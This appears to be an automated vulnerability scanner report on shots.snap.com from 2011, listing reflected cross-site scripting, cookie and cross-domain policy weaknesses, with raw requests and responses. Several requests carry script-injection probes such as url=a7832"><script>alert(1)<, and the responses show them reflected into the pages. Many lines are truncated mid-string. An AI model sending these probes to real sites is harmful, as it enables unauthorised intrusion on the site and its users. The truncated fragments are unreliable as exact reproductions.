1. Cross-site scripting (reflected)
1.1. http://shots.snap.com/rk.php [vid parameter]
1.2. http://shots.snap.com/shot/ [size parameter]
1.3. http://shots.snap.com/shot/ [svc parameter]
1.4. http://shots.snap.com/shot/ [url parameter]
1.5. http://shots.snap.com/shot/ [url parameter]
1.6. http://shots.snap.com/snap_shots.js [key parameter]
1.7. http://shots.snap.com/snap_shots.js [preview_trigger parameter]
3. Cookie scoped to parent domain
3.1. http://shots.snap.com/rk.php
3.3. http://shots.snap.com/preview/
3.4. http://shots.snap.com/shot/
3.5. http://shots.snap.com/snap_shots.js
4. Cookie without HttpOnly flag set
4.1. http://shots.snap.com/rk.php
4.3. http://shots.snap.com/preview/
4.4. http://shots.snap.com/shot/
4.5. http://shots.snap.com/snap_shots.js
6. Cross-domain Referer leakage
9. Content type incorrectly stated
9.1. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js
9.2. http://shots.snap.com/asj/v1/spakey/1797024321/auto_shot.js
9.3. http://shots.snap.com/favicon.ico
9.4. http://shots.snap.com/snap_shots.js
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /rk.php |
GET /rk.php?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:23:41 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:23:41 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: user=id%3D1626613240 Set-Cookie: session=id%3D1b339d8 Set-Cookie: session=id%3D1b339d8 Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:40 GMT; path=/; domain=.snap.com Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 9898 <html> <head> <style> body { margin: 0; padding: 0; background: #f2f2f2 url('http://i.ixnp.com border: 0; } #keywordTable { fon ...[SNIP]... <img src="http://direct.i.ixnp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:27:04 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:03 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 4635 <script> function showGLOW() { document.getElementById( } function hideGLOW() { document.getElementById( } function ...[SNIP]... m/preview.php?url=http%3A ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:37:39 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:37:38 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 2746 <html> <head> <title>Snap Shot - Error: Unknown Shot Type</title> <link rel="stylesheet" href="http://i.ixnp.com <link rel="stylesheet" href="http://i. ...[SNIP]... <i>20f2d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=a7832"><script>alert(1)< Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:23:40 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:39 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 4245 <script> function showGLOW() { document.getElementById( } function hideGLOW() { document.getElementById( } function ...[SNIP]... <a target=_parent style="border:0" href="a7832"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=44ce3<a%20b%3dc Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:23:49 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:48 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 4058 <script> function showGLOW() { document.getElementById( } function hideGLOW() { document.getElementById( } function ...[SNIP]... <a b=c>b5cf3745f80">44ce3<a b=c>b5cf3745f80/</a> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /snap_shots.js?ap=1&si=0 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:23:05 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:04 GMT; path=/; domain=.snap.com Set-Cookie: user=id%3D28b430f0e9 Set-Cookie: user=id%3D28b430f0e9 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:23:05 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 15266 //<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... ain_js/v6.59/"; s.parentNode.insertBefore var js = document.createElement( js.type = "text/javascript"; js.src = "http://shots.snap.com "/auto_shot.js?sz="+SNAP s.parentNode.insertBefore } SNAP_ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /snap_shots.js?ap=1&si=0 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:27:49 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:48 GMT; path=/; domain=.snap.com Set-Cookie: user=id%3D1db8e18d71 Set-Cookie: user=id%3D1db8e18d71 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:27:49 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 15260 //<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... ow_internal:false,preview ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: shots.snap.com |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:05 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 Last-Modified: Thu, 06 Aug 2009 19:44:15 GMT ETag: "10b-4707e583681c0" Accept-Ranges: bytes Content-Length: 267 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-requ ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /rk.php |
GET /rk.php?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:22:46 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: user=id%3D1626613240 Set-Cookie: session=id%3Dcc29bbb Set-Cookie: session=id%3Dcc29bbb Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 10269 <html> <head> <style> body { margin: 0; padding: 0; background: #f2f2f2 url('http://i.ixnp.com border: 0; } #keywordTable { fon ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /images/v6.59/snip/arrow |
GET /images/v6.59/snip/arrow Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:15:40 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:15:39 GMT; path=/; domain=.snap.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:15:40 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: image/gif Content-Length: 51 GIF89a.............!..... ...i. .....; |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /preview/ |
GET /preview/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 302 Found Date: Tue, 26 Apr 2011 01:22:39 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:38 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:22:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Location: http://shots.snap.com Content-Length: 0 Content-Type: text/html; charset=UTF-8 |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:22:19 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:18 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 13 <html></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /snap_shots.js?ap=1&si=0 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:04 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com Set-Cookie: user=id%3D97db340396 Set-Cookie: user=id%3D97db340396 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:04 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 15220 //<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /rk.php |
GET /rk.php?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:22:46 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: user=id%3D1626613240 Set-Cookie: session=id%3Dcc29bbb Set-Cookie: session=id%3Dcc29bbb Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 10269 <html> <head> <style> body { margin: 0; padding: 0; background: #f2f2f2 url('http://i.ixnp.com border: 0; } #keywordTable { fon ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /images/v6.59/snip/arrow |
GET /images/v6.59/snip/arrow Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:15:40 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:15:39 GMT; path=/; domain=.snap.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:15:40 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: image/gif Content-Length: 51 GIF89a.............!..... ...i. .....; |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /preview/ |
GET /preview/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 302 Found Date: Tue, 26 Apr 2011 01:22:39 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:38 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:22:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Location: http://shots.snap.com Content-Length: 0 Content-Type: text/html; charset=UTF-8 |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /shot/ |
GET /shot/?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:22:19 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:18 GMT; path=/; domain=.snap.com Set-Cookie: spa=spauser%3D1 Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 13 <html></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /snap_shots.js?ap=1&si=0 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:04 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com Set-Cookie: user=id%3D97db340396 Set-Cookie: user=id%3D97db340396 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:04 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 15220 //<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /asj/v1/6e8afd4f63cd |
GET /asj/v1/6e8afd4f63cd Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:21 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:21 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 199 if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; } SNAP_COM.autoshot = {"Results":{"Matches":null }} ; if (SNAP_COM.shot && SNAP_COM.shot.autoshot |
GET /asj/v1/6e8afd4f63cd Host: shots.snap.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:50 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:50 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 184 if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; } SNAP_COM.autoshot = {"Results":{}} ; if (SNAP_COM.shot && SNAP_COM.shot.autoshot |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /rk.php |
GET /rk.php?url=http%3A%2F Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:22:46 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: user=id%3D1626613240 Set-Cookie: session=id%3Dcc29bbb Set-Cookie: session=id%3Dcc29bbb Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 10269 <html> <head> <style> body { margin: 0; padding: 0; background: #f2f2f2 url('http://i.ixnp.com border: 0; } #keywordTable { fon ...[SNIP]... </li> <img src="http://direct.i.ixnp </ul> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | / |
TRACE / HTTP/1.0 Host: shots.snap.com Cookie: 84259dd932e40400 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:05 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: shots.snap.com Cookie: 84259dd932e40400 |
Severity: | Information |
Confidence: | Certain |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /robots.txt HTTP/1.0 Host: shots.snap.com |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:06 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 Last-Modified: Thu, 24 Apr 2008 15:53:27 GMT ETag: "1a-44ba0733bebc0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /asj/v1/6e8afd4f63cd |
